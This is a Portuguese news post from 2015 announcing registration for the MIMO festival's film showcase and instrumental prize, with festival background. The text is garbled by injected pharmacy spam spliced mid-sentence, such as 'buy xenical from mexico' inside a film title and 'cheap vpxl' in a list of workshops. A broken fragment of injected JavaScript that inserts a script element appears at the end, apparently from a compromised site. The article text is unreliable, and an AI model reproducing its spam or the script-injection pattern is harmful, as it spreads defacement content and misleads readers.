Escrito por em 21 jun 2015 nas áreas Cinema, Concurso, Festival, Música contemporânea, Notícia

MIMO abre inscrições para Festival de Cinema e Prêmio MIMO Instrumental no próximo dia 22.

 

O maior festival de música instrumental do país abre inscrições de 22 de junho a 20 de julho para o Festival MIMO de Cinema e o Prêmio MIMO Instrumental. Consagrado por trazer para cidades históricas brasileiras grandes nomes da música nacional e internacional, o MIMO também tem conceito em fomentar o gênero por meio de uma intensa programação. Este ano, o MIMO será realizado pela primeira vez no Rio de Janeiro (13 a 15 de novembro) em espaços culturais que são patrimônio da cidade como o Parque Lage, o Museu da República, a Sala Cecília Meireles, a Igreja da Candelária e o Outeiro da Gloria. O festival também ocorrerá em Paraty (2 a 4 de outubro) e Olinda (20 a 22 de novembro).

O Prêmio MIMO Instrumental tem o objetivo de descobrir novos talentos da música brasileira. O edital seleciona músicos de 18 a 35 anos de todo o país para integrar a programação oficial. Podem se inscrever solistas ou grupos de instrumentistas formados por até cinco pessoas, com trabalhos autorais ou não, nas categorias de música clássica ou popular. Em 2014, superando as expectativas, foram recebidas 346 inscrições e quatro atrações foram selecionadas para se apresentarem no mesmo palco com grandes nomes da música mundial.

Já o Festival MIMO de Cinema reúne filmes que têm a música como protagonista. As inscrições estão abertas para a Mostra Panorama Brasil, que exibe filmes nacionais de produção recente, inéditos em circuito comercial. Os filmes são projetados nos pátios das Igrejas, em tendas especialmente montadas e em salas de cinema, sempre em sessões gratuitas. Evento único neste formato e gênero no país, o Festival Mimo de Cinema já exibiu uma safra de importantes produções nacionais como Tropicália buy xenical from mexico , de Marcelo Machado; Cauby – Começaria tudo outra vez, de Nelson Hoineff; Faroeste Caboclo, de René Sampaio; Jards Cheap online , de Eryk Rocha; e o documentário Olho Nu, dirigido por Joel Pizzini e estrelado por Ney Matogrosso, que marcou presença durante o festival de 2013.

As inscrições e informações detalhadas para participar do Festival de Cinema e do Prêmio MIMO Instrumental estarão disponíveis no site do evento.

MIMO

O MIMO, em 2004, teve sua primeira edição em Olinda e já atraiu 880 mil espectadores em 300 concertos de grandes nomes do cenário cultural nacional e internacional, como Buena Vista Social Club, Madredeus, Ibrahim Maalouf, Toninho Horta, Chucho Valdés, Richard Bona, Egberto Gismonti e Richard Galliano.

Chega a esta 12ª edição como o maior festival de música instrumental do Brasil. Realizado em cidades que preservam bens e valores culturais do país, oferecerá concertos em espaços do patrimônio histórico como igrejas, teatros, museus e praças nas cidades de Paraty, Rio de Janeiro e Olinda. Este ano, o festival também irá contar com atividades em Ouro Preto e Tiradentes, no mês de outubro. Entre as atrações já confirmadas para 2015 estão o celebrado músico malinês Salif Keita o guitarrista nigeriano order ethionamide dosage Omara ‘Bombino’ Moctar.

Além das atividades realizadas, o MIMO deixa um legado por onde passa por meio da substancial Etapa Educativa. Com o objetivo de fortalecer a música instrumental produzida no país, esta fase do festival é composta por aulas, workshops is there a generic drug for coreg cr cheap vpxl , oficinas e Order masterclasses Purchase ministradas pelos artistas convidados para o evento. As atividades também são gratuitas e até 2014 mais de 18 mil alunos já haviam sido beneficiados.document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

Faça seu comentário